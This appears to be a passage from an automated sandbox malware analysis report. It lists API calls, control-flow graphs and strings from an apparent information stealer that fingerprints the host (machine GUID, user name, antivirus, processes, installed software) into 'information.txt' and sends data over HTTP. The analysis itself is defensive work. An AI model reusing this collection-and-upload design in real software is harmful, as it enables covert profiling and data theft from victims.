                                                                                                                                                                                                            control_flow_graph 565 405bc0-405cb2 call 40fd40 call 404350 call 40fd00 * 5 call 40ffa0 InternetOpenA StrCmpCA 582 405cb4 565->582 583 405cbb-405cbd 565->583 582->583 584 405cc3-405e41 call 411330 call 40fe30 call 40fde0 call 40fd80 * 2 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fe30 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fe30 call 40fde0 call 40fd80 * 2 InternetConnectA 583->584 585 40639f-4063c0 InternetCloseHandle call 40ffa0 call 406e30 583->585 669 405e47-405e7f HttpOpenRequestA 584->669 670 40639c 584->670 595 4063c2-4063ef call 40fd90 call 40fec0 call 40fde0 call 40fd80 585->595 596 4063f4-40647c call 411260 * 2 call 40fd80 * 8 585->596 595->596 671 406395-406396 InternetCloseHandle 669->671 672 405e85-405e89 669->672 670->585 671->670 673 405ea1-406330 call 40fec0 call 40fde0 call 40fd80 call 40fe30 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fe30 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fe30 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 402370 call 40fe30 call 40fde0 call 40fd80 * 2 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fe30 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fe30 call 40fde0 call 40fd80 call 40ffa0 lstrlenA call 40ffa0 lstrlenA GetProcessHeap HeapAlloc call 40ffa0 lstrlenA call 40ffa0 memcpy call 40ffa0 lstrlenA call 40ffa0 * 2 lstrlenA memcpy call 40ffa0 lstrlenA call 40ffa0 HttpSendRequestA InternetReadFile 672->673 674 405e8b-405e9b InternetSetOptionA 672->674 835 406332-406337 673->835 836 406388-406392 InternetCloseHandle 673->836 674->673 835->836 837 406339-406386 call 40fec0 call 40fde0 call 40fd80 InternetReadFile 835->837 836->671 837->835 837->836
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                              • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                              • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405C8A
                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405E34
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00CBF430,?,00CC2020,00000000,00000000,-00400100,00000000), ref: 00405E74
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00420071,?,00000000,00420071,",00000000,00420071,mode,00000000,00420071,00CBE8B0,00000000,00420071,00426820), ref: 00406272
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406283
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040628E
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406295
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004062A6
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 004062B7
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062C8
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062E1
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 004062EA
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004062FD
                                                                                                                                                                                                            • HttpSendRequestA.WININET(?,00000000,00000000), ref: 00406311
                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,000000C7,00000000), ref: 00406328
                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,000000C7,00000000), ref: 0040637E
                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406389
                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405E9B
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00406396
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004063A0
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,00000000), ref: 00405CAA
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
                                                                                                                                                                                                            • String ID: "$"$"$*$------$------$------$------$build_id$d~A$d~A$mode
                                                                                                                                                                                                            • API String ID: 530647464-1882268820
                                                                                                                                                                                                            • Opcode ID: fa1efbd99ebc7784c1cdbbacf0403da554903c06edd50a0d9a7fc80c2b11aa11
                                                                                                                                                                                                            • Instruction ID: bc472f71be83f28281829215804d958748811d57b1b2f0779ce4331b63c6d1e7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa1efbd99ebc7784c1cdbbacf0403da554903c06edd50a0d9a7fc80c2b11aa11
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00525171801148EACB15EBE5C956BEEBBB89F18304F54407EE502735C2DA786B0DCBB9
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00415530 Relevance: 50.0, APIs: 2, Strings: 26, Instructions: 1035stringCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 844 415530-41636f call 40fd00 call 40fec0 call 40fde0 call 40fd80 call 402340 call 40fe30 call 40fde0 call 40fd80 * 2 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 410180 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 410b10 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 410bb0 call 40fe30 call 40fde0 call 40fd80 * 2 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 410c10 call 40fe30 call 40fde0 call 40fd80 * 2 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 GetCurrentProcessId call 4118a0 call 40fe30 call 40fde0 call 40fd80 * 2 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 410dc0 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 410f00 call 40fe30 call 40fde0 call 40fd80 * 2 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 4110c0 call 40fe30 call 40fde0 call 40fd80 * 2 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 410140 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 410100 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 410a90 call 40fe30 call 40fde0 call 40fd80 * 2 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 410250 call 40fe30 call 40fde0 call 40fd80 * 2 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 410180 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 4101e0 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 4103b0 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 410460 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 410420 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 410560 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 4105d0 call 40fe30 call 40fde0 call 40fd80 * 2 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 410980 call 40fe30 call 40fde0 call 40fd80 * 2 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 4106e0 call 40fe30 call 40fde0 call 40fd80 * 2 call 4106e0 call 40fe30 call 40fde0 call 40fd80 * 2 call 40fec0 call 40fde0 call 40fd80 call 40ffa0 lstrlenA call 40ffa0 call 40fd00 call 401060 call 4152b0 call 40fd80 * 5
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                              • Part of subcall function 00410180: GetProcessHeap.KERNEL32(00000000,00000104,?,004271E0,00000000,?,00000000,00000000), ref: 0041018E
                                                                                                                                                                                                              • Part of subcall function 00410180: HeapAlloc.KERNEL32(00000000,?,004271E0,00000000,?,00000000,00000000), ref: 00410195
                                                                                                                                                                                                              • Part of subcall function 00410180: GetLocalTime.KERNEL32(qB,?,004271E0,00000000,?,00000000,00000000), ref: 004101A1
                                                                                                                                                                                                              • Part of subcall function 00410180: wsprintfA.USER32 ref: 004101CD
                                                                                                                                                                                                              • Part of subcall function 00410B10: memset.MSVCRT ref: 00410B35
                                                                                                                                                                                                              • Part of subcall function 00410B10: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410B52
                                                                                                                                                                                                              • Part of subcall function 00410B10: RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410B74
                                                                                                                                                                                                              • Part of subcall function 00410B10: CharToOemA.USER32(00000000,?), ref: 00410B92
                                                                                                                                                                                                              • Part of subcall function 00410BB0: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410BC5
                                                                                                                                                                                                              • Part of subcall function 00410C10: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410C48
                                                                                                                                                                                                              • Part of subcall function 00410C10: GetVolumeInformationA.KERNEL32(004218D9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410C81
                                                                                                                                                                                                              • Part of subcall function 00410C10: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410CCD
                                                                                                                                                                                                              • Part of subcall function 00410C10: HeapAlloc.KERNEL32(00000000), ref: 00410CD4
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00427218,00000000,?,00000000,00000000,00000000,00000000), ref: 0041586B
                                                                                                                                                                                                              • Part of subcall function 004118A0: OpenProcess.KERNEL32(00000410,00000000,?), ref: 004118BC
                                                                                                                                                                                                              • Part of subcall function 004118A0: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004118D7
                                                                                                                                                                                                              • Part of subcall function 004118A0: CloseHandle.KERNEL32(00000000), ref: 004118DE
                                                                                                                                                                                                              • Part of subcall function 00410DC0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DD5
                                                                                                                                                                                                              • Part of subcall function 00410DC0: HeapAlloc.KERNEL32(00000000), ref: 00410DDC
                                                                                                                                                                                                              • Part of subcall function 00410F00: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042723C,00000000,?,Work Dir: In memory,00000000,?,00427224,00000000), ref: 00410F23
                                                                                                                                                                                                              • Part of subcall function 00410F00: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042723C), ref: 00410F34
                                                                                                                                                                                                              • Part of subcall function 00410F00: CoCreateInstance.OLE32(00427B4C,00000000,00000001,00427A7C,?,?,00000000,?,Windows: ,00000000,?,0042723C,00000000,?,Work Dir: In memory,00000000), ref: 00410F4E
                                                                                                                                                                                                              • Part of subcall function 00410F00: CoSetProxyBlanket.OLE32($rB,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042723C,00000000), ref: 00410F87
                                                                                                                                                                                                              • Part of subcall function 00410F00: VariantInit.OLEAUT32(?), ref: 00410FE6
                                                                                                                                                                                                              • Part of subcall function 004110C0: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00427260,00000000,?,00000000,00000000), ref: 004110E3
                                                                                                                                                                                                              • Part of subcall function 004110C0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427260), ref: 004110F4
                                                                                                                                                                                                              • Part of subcall function 004110C0: CoCreateInstance.OLE32(00427B4C,00000000,00000001,00427A7C,?,?,00000000,?,AV: ,00000000,?,00427260,00000000,?,00000000,00000000), ref: 0041110E
                                                                                                                                                                                                              • Part of subcall function 004110C0: CoSetProxyBlanket.OLE32(`rB,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427260,00000000), ref: 00411147
                                                                                                                                                                                                              • Part of subcall function 004110C0: VariantInit.OLEAUT32(?), ref: 004111A2
                                                                                                                                                                                                              • Part of subcall function 00410140: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00415AFE,00000000,?,Computer Name: ,00000000,?,0042726C,00000000,?,00000000,00000000), ref: 0041014C
                                                                                                                                                                                                              • Part of subcall function 00410140: HeapAlloc.KERNEL32(00000000,?,?,?,00415AFE,00000000,?,Computer Name: ,00000000,?,0042726C,00000000,?,00000000,00000000,00000000), ref: 00410153
                                                                                                                                                                                                              • Part of subcall function 00410140: GetComputerNameA.KERNEL32(00000000,00000000), ref: 00410167
                                                                                                                                                                                                              • Part of subcall function 00410100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00418382,004271D3), ref: 0041010C
                                                                                                                                                                                                              • Part of subcall function 00410100: HeapAlloc.KERNEL32(00000000,?,?,?,00418382,004271D3), ref: 00410113
                                                                                                                                                                                                              • Part of subcall function 00410100: GetUserNameA.ADVAPI32(00000000,004271D3), ref: 00410127
                                                                                                                                                                                                              • Part of subcall function 00410A90: CreateDCA.GDI32(00CB2EC0,00000000,00000000,00000000), ref: 00410AAA
                                                                                                                                                                                                              • Part of subcall function 00410A90: GetDeviceCaps.GDI32(00000000,00000008), ref: 00410AB5
                                                                                                                                                                                                              • Part of subcall function 00410A90: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410AC0
                                                                                                                                                                                                              • Part of subcall function 00410A90: ReleaseDC.USER32(00000000,00000000), ref: 00410ACB
                                                                                                                                                                                                              • Part of subcall function 00410A90: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415BFA,?,00000000,?,Display Resolution: ,00000000,?,00427290,00000000), ref: 00410AD8
                                                                                                                                                                                                              • Part of subcall function 00410A90: HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415BFA,?,00000000,?,Display Resolution: ,00000000,?,00427290,00000000,?), ref: 00410ADF
                                                                                                                                                                                                              • Part of subcall function 00410A90: wsprintfA.USER32 ref: 00410AEF
                                                                                                                                                                                                              • Part of subcall function 00410250: GetKeyboardLayoutList.USER32(00000000,00000000,00426ED7,?,?,00000001), ref: 00410297
                                                                                                                                                                                                              • Part of subcall function 00410250: LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 004102A9
                                                                                                                                                                                                              • Part of subcall function 00410250: GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 004102B4
                                                                                                                                                                                                              • Part of subcall function 00410250: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 004102E6
                                                                                                                                                                                                              • Part of subcall function 00410250: LocalFree.KERNEL32(?,?,?,00000001), ref: 0041038A
                                                                                                                                                                                                              • Part of subcall function 004101E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004101F1
                                                                                                                                                                                                              • Part of subcall function 004101E0: HeapAlloc.KERNEL32(00000000), ref: 004101F8
                                                                                                                                                                                                              • Part of subcall function 004101E0: GetTimeZoneInformation.KERNEL32(?), ref: 00410207
                                                                                                                                                                                                              • Part of subcall function 004101E0: wsprintfA.USER32 ref: 00410232
                                                                                                                                                                                                              • Part of subcall function 004103B0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004103C5
                                                                                                                                                                                                              • Part of subcall function 004103B0: HeapAlloc.KERNEL32(00000000), ref: 004103CC
                                                                                                                                                                                                              • Part of subcall function 004103B0: RegOpenKeyExA.KERNEL32(80000002,00CBB3A0,00000000,00020119,00000000), ref: 004103EB
                                                                                                                                                                                                              • Part of subcall function 004103B0: RegQueryValueExA.KERNEL32(00000000,00CC1910,00000000,00000000,00000000,000000FF), ref: 00410406
                                                                                                                                                                                                              • Part of subcall function 00410460: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410482
                                                                                                                                                                                                              • Part of subcall function 00410460: GetLastError.KERNEL32(?,?,00000001), ref: 00410490
                                                                                                                                                                                                              • Part of subcall function 00410460: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 004104C8
                                                                                                                                                                                                              • Part of subcall function 00410460: wsprintfA.USER32 ref: 00410512
                                                                                                                                                                                                              • Part of subcall function 00410420: GetSystemInfo.KERNEL32(00000000), ref: 0041042D
                                                                                                                                                                                                              • Part of subcall function 00410420: wsprintfA.USER32 ref: 00410443
                                                                                                                                                                                                              • Part of subcall function 00410560: GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004272DC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,004272C8), ref: 0041056E
                                                                                                                                                                                                              • Part of subcall function 00410560: HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004272DC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,004272C8,00000000), ref: 00410575
                                                                                                                                                                                                              • Part of subcall function 00410560: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410595
                                                                                                                                                                                                              • Part of subcall function 00410560: wsprintfA.USER32 ref: 004105BB
                                                                                                                                                                                                              • Part of subcall function 004105D0: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410627
                                                                                                                                                                                                              • Part of subcall function 004105D0: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 004106B4
                                                                                                                                                                                                              • Part of subcall function 00410980: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004109CF
                                                                                                                                                                                                              • Part of subcall function 00410980: Process32First.KERNEL32(00000000,00000128), ref: 004109DF
                                                                                                                                                                                                              • Part of subcall function 00410980: Process32Next.KERNEL32(00000000,00000128), ref: 004109F1
                                                                                                                                                                                                              • Part of subcall function 00410980: Process32Next.KERNEL32(00000000,00000128), ref: 00410A5E
                                                                                                                                                                                                              • Part of subcall function 00410980: CloseHandle.KERNEL32(00000000), ref: 00410A69
                                                                                                                                                                                                              • Part of subcall function 004106E0: RegOpenKeyExA.KERNEL32(00000000,00CB65D8,00000000,00020019,00000000,00426EEF,?,00000001), ref: 0041073F
                                                                                                                                                                                                              • Part of subcall function 004106E0: RegEnumKeyExA.KERNEL32(00000000,?,?,TsB,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041079E
                                                                                                                                                                                                              • Part of subcall function 004106E0: wsprintfA.USER32 ref: 004107C7
                                                                                                                                                                                                              • Part of subcall function 004106E0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 004107E5
                                                                                                                                                                                                              • Part of subcall function 004106E0: RegQueryValueExA.KERNEL32(?,00CC1C30,00000000,000F003F,?,00000400), ref: 00410815
                                                                                                                                                                                                              • Part of subcall function 004106E0: lstrlenA.KERNEL32(?), ref: 0041082A
                                                                                                                                                                                                              • Part of subcall function 004106E0: RegQueryValueExA.KERNEL32(?,00CC1B58,00000000,000F003F,?,00000400,00000000,00421861,?,00000000,?,00426F20), ref: 004108AE
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,00427364,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004162D7
                                                                                                                                                                                                              • Part of subcall function 004152B0: Sleep.KERNEL32(000003E8,00422461, cA,?,?,?,00000001), ref: 00415375
                                                                                                                                                                                                              • Part of subcall function 004152B0: CreateThread.KERNEL32(00000000,00000000,00413CE0,?,00000000,00000000), ref: 00415396
                                                                                                                                                                                                              • Part of subcall function 004152B0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004153A2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InformationInitializeQueryValuelstrcpy$EnumLocalNameProcess32lstrlen$BlanketCapsCloseCurrentDeviceDevicesDisplayHandleInfoInitInstanceKeyboardLayoutListLogicalNextProcessorProxySecurityTimeVariantlstrcat$CharComputerDirectoryErrorFileFirstFreeGlobalLastLocaleMemoryModuleObjectProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                            • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $W$Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                            • API String ID: 1864629043-4117839003
                                                                                                                                                                                                            • Opcode ID: 2c6c9724e5bdecf852c01c1ffb79ca22e33e3b8ef971acd903b75f686fe58e4d
                                                                                                                                                                                                            • Instruction ID: 26cafb2f86e515faa13c11179d5727bf41869b8a89582cf965f9f8e74f67bc59
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c6c9724e5bdecf852c01c1ffb79ca22e33e3b8ef971acd903b75f686fe58e4d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC927071801288E9CB15E7E1C956AEEBB785F28304F5041BEF542335C2DE782B4DCAB9
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00414200 Relevance: 43.2, APIs: 11, Strings: 13, Instructions: 1203sleepCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
